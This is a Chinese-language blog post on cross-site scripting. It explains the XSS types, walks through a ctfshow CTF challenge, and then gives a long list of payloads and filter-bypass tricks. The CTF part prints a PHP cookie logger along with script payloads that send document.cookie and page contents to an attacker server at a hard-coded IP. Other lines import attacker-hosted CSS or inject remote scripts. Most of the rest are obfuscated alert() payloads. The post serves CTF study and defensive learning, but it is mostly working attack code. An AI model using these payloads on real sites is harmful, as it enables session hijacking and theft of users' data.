XSS | Nanian233🍊's Blog

XSS的本质是一种高级钓鱼手法。

认识XSS

XSS (Cross Site Scripting) 攻击全称跨站脚本攻击，是为不和层叠样式表 (Cascading Style Sheets, CSS) 的缩写混淆，故将跨站脚本攻击缩写为 XSS。

XSS 是一种经常出现在 Web 应用中的计算机安全漏洞，它允许恶意 Web 用户将代码植入到提供给其它用户使用的页面中。

在XSS攻击中，一般有三个角色参与：攻击者、目标服务器、受害者的浏览器。

原理：将恶意的 script 脚本插入进 html/css/js 文件当中。

反射型XSS

反射型XSS，又称非持久型XSS。
之所以称为反射型XSS，是因为这种攻击方式的注入代码是从目标服务器通过错误信息、搜索结果等等方式“反射”回来的：发出请求时，XSS代码出现在URL中，作为输入提交到服务器端，服务器端解析后响应，XSS代码随响应内容一起传回给浏览器，最后浏览器解析执行XSS代码。这个过程像一次反射，故叫反射型XSS。
而称为非持久型XSS，则是因为这种攻击方式具有一次性，由于代码注入的是一个动态产生的页面而不是永久的页面，因此这种攻击方式只在点击链接的时候才产生作用。

特点：
① 不经过服务器存储，直接通过 HTTP 的 GET 和 POST 请求就能完成一次攻击，拿到用户隐私数据；
②攻击者需要诱骗点击；
③反馈率低，所以较难发现和响应修复；
④盗取用户敏感保密信息。

存储型XSS

存储型XSS，又称持久型XSS。
他和反射型XSS最大的不同就是，攻击脚本将被永久地存放在目标服务器端（数据库，内存，文件系统等），下次请求目标页面时不用再提交XSS代码。
一般存在于 Form 表单提交等交互功能，如发帖留言，提交文本信息等，多见于论坛。黑客利用的 XSS 漏洞，将内容经正常功能提交进入数据库持久保存，当前端页面获得后端从数据库中读出的注入代码时，恰好将其渲染执行。
特点：
①持久性，植入在数据库中；
②危害面广，甚至可以让用户机器变成 DDoS 攻击的肉鸡；
③ 盗取用户敏感私密信息。

DOM型XSS

DOM型XSS 是基于文档对象模型 Document Objeet Model，DOM)的一种漏洞。对于img，input等这种类型的 DOM 节点标签，DOM型XSS就可以利用其进行攻击
DOM 型 XSS 全部都是由前端进行触发的。

例题：ctfshow web入门 316

输入什么就返回什么，尝试执行js代码<script>alert(1)</script>

成功返回了弹窗

本题的flag在管理员的cookie中，机器人会定时自动点击生成的链接

创建一个自动接收脚本a.php在vps上

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

生成Xss代码链接,用于获取管理员cookie

<body/**/onload="window.open('http://ip:port/index.php/?1='+document.cookie)"></body>

<body/**/onload="window.location.href='http://ip:port/index.php/?1='+document.cookie"></body>

<script>window.open("http://149.88.83.236:8000/a.php/?1="+document.cookie)</script>

python3 -m http.server监听即可拿到cookie

1	<script>window.open('http://149.88.83.236:8000/a.php'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>

片段	说明
`window.open(url)`	在新窗口打开一个 URL（或发起 GET 请求）
`'http://149.88.83.236:8000/a.php'`	攻击者自己的服务器（用于收集数据）
`document.getElementsByClassName(...)[1]`	获取页面中 class 为 `layui-table-cell laytable-cell-1-0-1` 的第 2 个元素
`.innerHTML`	提取该元素的 HTML 内容，可能是 flag 或敏感数据
拼接成完整 URL	将敏感信息拼接到 URL 参数中传回给攻击者

1	<script>$('.layui-table-cell').each(function(index,value){{if(value.innerHTML.indexOf('ctfshow') > -1){window.open("http://149.88.83.236:8000/a.php/?1="+value.innerHTML);}}})</script>

遍历所有 .layui-table-cell 元素
判断其 innerHTML 是否包含 'ctfshow'（ flag 的前缀）
一旦匹配，就使用 window.open() 打开新窗口并带走 flag 内容

bypass

常规使用<script>alert(1)</script>

其次可以使用img body input

在 IMG 标签中，当给定的图片 URL 地址存在且图片加载完成，则触发onload事件。当给定的图片 URL 地址不存在或网络出错时，则触发onerror事件。

如果()被过滤，可以用//和``替代
如果空格被过滤,可以用/**/绕过
如果<>被过滤，可以用%3c和%3e替代
如果引号被过滤，可以用%27或%22替代

payload集合

#第一类：Javascript URL
<a href="javascript:alert('test')">link</a>
<a href="javascript:alert('xss')">link</a>
<a href='vbscript:MsgBox("XSS")'>link</a>
<a href="vbscript:alert(1)">Hello</a>
<a href="vbscript:alert(1)">Hello</a>
<a href=javascript:alert("XSS")>link</a>
<a href=`javascript:alert("RSnake says,'XSS'")`>link</a>
<a href=javascript:alert(String.fromCharCode(88,83,83))>link</a>
<a href="javascript&colon;alert(1)">link</a>
<a href="javaSCRIPT&colon;alert(1)">Hello</a>
<a href="javasc&NewLine;ript&colon;alert(1)">link</a> 
<a href="javas&Tab;cript:\u0061lert(1);">Hello</a>
<a href="jav    ascript:alert('XSS')">link</a>
<a href="jav&#x09;ascript:alert('XSS')">link</a>
<a href="jav&#x0D;ascript:alert('XSS')">link</a>
<a href="   javascript:alert('XSS');">link</a>
<a href="javascript:\u0061lert&#x28;1&#x29">Hello</a>
<a href="javascript:confirm`1`">link</a>
<a href="javascript:confirm(1)">link</a>
<a href="j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)">1</a>
<a href="javascript:%61%6c%65%72%74%28%31%29">link</a>
<a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">link</a>
<a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>2</a>
<a href=javascript:eval("alert('xss')")>link</a>  
<a href=javascript:alert('XSS')>link</a>
<a href=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>link</a>
<a href=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>link</a>
<a href="data:text/html;base64,amF2YXNjcmlwdDphbGVydCgxKQ==">test</a> 
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+>1</a>
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
    
#第二类：CSS import
<style>@import url("http://attacker.org/malicious.css");</style>
<style>@imp\ort url("http://attacker.org/malicious.css");</style>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE>@import'http://jb51.net/xss.css';</STYLE>
#第三类：Inline style
    
<div style="color: expression(alert('XSS'))">
<div style=color:expression\(alert(1))></div> 
<div style="color: '<'; color: expression(alert('XSS'))">
<div style=X:expression(alert(/xss/))>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<div style="z:exp/*anything*/res/*here*/sion(alert(1))">
<div style=xss:expr/*XSS*/ession(alert('XSS'))>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.baidu.com")> 
<img STYLE="background-image:url(javascript:alert('XSS'))"> //ie6  
<img STYLE="background-image:\75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\72\74\28\27\58\53\53\27\29\29"> 
<A STYLE='no\xss:noxss("*//*");xss:ex&#x2F;*XSS*//*/*/pression(alert("XSS"))'>

#第四类：JavaScript 事件
<div onclick="alert('xss')">
<div onmouseenter="alert('xss')">
<div onclick ="alert('xss')">
<BODY ONLOAD=alert('XSS')>
<img src=1 onerror=alert(1)>
<img/src='1'/onerror=alert(0)>
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
<img src=1 onmouseover=alert('xss') a1=1111> 
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://t.cn/R5UpyOt';>
<a href="#" onclick=alert('\170\163\163')>test</a>
<a href="#" onclick="\u0061\u006C\u0065\u0072\u0074(1)">link</a>
<a href="#" onclick="\u0061\u006C\u0065\u0072\u0074`a`">link</a>
<a href="#" onclick="alert('xss')">link</a>
<marquee onscroll=alert(1)> test</marquee>
<div  style="width:100px;height:100px;overflow:scroll" onscroll="alert('a')">123456 <br/><br/><br/><br/><br/></div>
<DIV onmousewheel="alert('a')" >123456</DIV><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<div style="background-color:red" onmouseenter="alert('a')">123456</div>
<DIV onmouseleave="alert('1')">123456</DIV>
<div contentEditable="true" style="background-color:red" onfocusin="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red" onfocusout="alert('bem')" >asdf</div>
<marquee onstart="alert('a')" >asdf</marquee>
<div style="background-color:red;" onbeforecopy="alert('a')" >asdf</div>
<div style="background-color:red;" onbeforecut="alert('a')" >asdf</div>
<div style="background-color:red;" contentEditable="true" onbeforeeditfocus="alert('a')" >asdf</div>
<div style="background-color:red;" ="true" onbeforepaste="alert('a')" >asdf</div>
<div style="background-color:red;" oncontextmenu="alert('a')" >asdf</div>
<div style="background-color:red;" oncopy="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" oncut="alert('a')" >asdf</div>
<div style="background-color:red;" ondrag="alert('1')" >asdf</div>
<div style="background-color:red;" ondragend="alert('a')" >asdf</div>
<div style="background-color:red;" ondragenter="alert('b')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragleave="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragover="alert('b')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragstart="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondrop="alert('b')" >asdf</div> <div contentEditable="true" style="background-color:green;" ondrop="alert('bem')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onlosecapture="alert('b')">asdf</div>
<div contentEditable="true" style="background-color:red;" onpaste="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onselectstart="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onhelp="alert('a')" >asdf</div>
<div STYLE="background-color:red;behavior:url('#default#time2')" onEnd="alert('a')">asdf</div>
<div STYLE="background-color:red;behavior:url('#default#time2')" onBegin="alert('a')">asdf</div>
<div contentEditable="true" STYLE="background-color:red;" onactivate="alert('b')">asdf</div>
<div contentEditable="true" STYLE="background-color:red;filter: Alpha(opacity=100, style=2);"onfilterchange="alert('b')">asdf</div>
<div contentEditable="true" onbeforeactivate="alert('b')">asdf</div>
<div contentEditable="true" onbeforedeactivate="alert('a')">asdf</div>
<div contentEditable="true" ondeactivate="alert('bem')">asdf</div>
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />
<audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)">
<audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)"></audio>
<body onscroll=alert(26)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<input type="hidden" accesskey="X" onclick="alert(/xss/)">


#第五类：Script 标签
<script src="http://baidu.com"></script><script>Function(atob('YWxlcnQoInhzcyIp'))()</script>
<script>alert("XSS")</script>
<scr<script>ipt>alert("XSS")</scr<script>ipt>
<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
<script>alert(/1/.source)</script>
<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm(1);</script>
<script>alert(/88199/)</script>
<script>alert(`a`)</script>
<script>alert('a')</script>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<script>eval(alert(1))</script>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 50, 51, 41))</script>
<script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029")</script>
<script>eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script>setTimeout('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script>setTimeout(alert(1),0)</script>
<script>setTimeout`alert\x28\x27 xss \x27\x29`</script>
<script>setInterval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>

<script src=data:text/javascript,alert(1)></script>
<script src=&#100&#97&#116&#97:text/javascript,alert(1)></script>

<script>\u0061\u006C\u0065\u0072\u0074(123)</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>\u0061\u006C\u0065\u0072\u0074`a`</script>
<script>window['alert'](0)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
<script>top['alert'](3)</script>
<!--[if]><script>alert(1)</script     -->

<script>alert("xss");;;;;;;;;;;;;;;;;    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script>
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>

1、onmouseenter：当鼠标进入选区执行代码
<div style="123456</div>

2、onmouseleave：当鼠标离开选区执行代码
<DIV onmouseleave="alert('bem')" style="123456</DIV>

3、onmousewheel：当鼠标在选区滚轮时执行代码
<DIV onmousewheel="alert('bem')" style="123456</DIV>

4、onscroll：拖动滚动条执行代码
<div style="width:100px;height:100px;overflow:scroll" onscroll="alert('bem')">123456
</div>

5、onfocusin：当获得焦点时执行代码
<div contentEditable="true" style="asdf</div>

6、onfocusout：当失去焦点时执行代码
<div contentEditable="true" style="asdf</div>

7、onstart：当显示内容时执行代码
<marquee style="background-color:red" onstart="alert('bem')" >asdf</marquee>

8、onbeforecopy：选中内容后右键执行代码
<div style="" onbeforecopy="alert('bem')" >asdf</div>

9、onbeforecut：选中内容后右键执行代码
<div style="" onbeforecut="alert('bem')" >asdf</div>

10、onbeforeeditfocus：当获得焦点时执行代码
<div style="" contentEditable="true" onbeforeeditfocus="alert('bem')" >asdf</div>

11、onbeforepaste：选中内容后右键执行代码
<div style="" ="true" onbeforepaste="alert('bem')" >asdf</div>

12、oncontextmenu：鼠标右键执行代码
<div style="" oncontextmenu="alert('bem')" >asdf</div>

13、oncopy：鼠标右键执行复制时执行代码
<div style="" oncopy="alert('bem')" >asdf</div>

14、oncut：鼠标右键执行剪切时执行代码
<div contentEditable="true" style="" oncut="alert('bem')" >asdf</div>

15、ondrag：选择内容并拖动时执行代码
<div style="" ondrag="alert('bem')" >asdf</div>

16、ondragend：选择内容并拖动松开鼠标执行代码
<div style="" ondragend="alert('bem')" >asdf</div>

17、ondragenter：选择内容并拖动时执行代码
<div style="" ondragenter="alert('bem')" >asdf</div>

18、ondragleave：选择内容并拖出边框执行代码
<div contentEditable="true" style="" ondragleave="alert('bem')" >asdf</div>

19、ondragover：选择内容并拖动时执行代码
<div contentEditable="true" style="" ondragover="alert('bem')" >asdf</div>

20、ondragstart：选择内容并拖动时执行代码
<div contentEditable="true" style="" ondragstart="alert('bem')" >asdf</div>

21、ondrop：有内容被拖动进来时执行代码
<div contentEditable="true" style="" ondrop="alert('bem')" >asdf</div>
<div contentEditable="true" style="" ondrop="alert('bem')" >asdf</div>

22、onlosecapture：选择内容时执行代码
<div contentEditable="true" style="" onlosecapture="alert('bem')" >asdf</div>

23、onpaste：粘贴时执行代码
<div contentEditable="true" style="" onpaste="alert('bem')" >asdf</div>

24、onselectstart：选择内容时执行代码
<div contentEditable="true" style="" onselectstart="alert('bem')" >asdf</div>

25、onhelp：进入焦点按F1时执行代码
<div contentEditable="true" style="" onhelp="alert('bem')" >asdf</div>

26、onEnd：当时间线执行完毕时执行代码
<div STYLE="behavior:url('#default#time2')" onEnd="alert('bem')">asdf</div>

27、onBegin：当时间线开始执行代码
<div STYLE="behavior:url('#default#time2')" onBegin="alert('bem')">asdf</div>

28、onactivate：激活当前标签时执行代码
<div contentEditable="true" STYLE="" onactivate="alert('bem')">asdf</div>

29、onfilterchange：当滤镜改变时执行代码
<div contentEditable="true" STYLE="filter: Alpha(opacity=100, style=2);" onfilterchange="alert('bem')">asdf</div>

30、onbeforeactivate：当激活当前标签时执行代码
<div contentEditable="true" STYLE="" onbeforeactivate="alert('bem')">asdf</div>

31、onbeforedeactivate：当标签内值改变时执行代码
<div contentEditable="true" STYLE="" onbeforedeactivate="alert('bem')">asdf</div>

32、ondeactivate：当标签内值改变时执行代码
<div contentEditable="true" STYLE="" ondeactivate="alert('bem')">asdf</div>

<a>标签
<a href=javascript:alert(1)>111</a>

<img>标签
<img src=https://www.baidu.com/img/flexible/logo/pc/result.png>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>

<input>标签
<input onmouseover=alert(1) />

<script>标签
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>

alert被过滤，可以prompt、confirm、console.log替换使用：
如果都被过滤，可以换个方式绕过

onmouseover=top[11189117..toString(32)](2222)
onmouseover=top[11189117..toString(32)](2222)
onmouseover="setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))"

onmousemove=top[11189117..toString(32)](2222)
onmouseover=top[11189117..toString(32)](2222)
onclick=……………………等等
onmousemove='alert(1111)'a="
<script>top[11189117..toString(32)](2222)</script>
<ScRiPt>top[11189117..toString(32)](2222)</ScRiPt>
%3cscript%3ealert(1111)%3c/script%3e
<Script>\u0061\u006C\u0065\u0072\u0074(1111)</Script>

<img src=java\0script:alert`1111`>
<img src=x onerror=alert`1111`>
%3Cimg+src%3Dx+onerror%3Dtop[11189117..toString(32)]%601111%60%3E

参考：
从0到1完全掌握 XSS
web攻防之XSS攻击详解——XSS简介与类型

XSS payload 大全 - Bypass - 博客园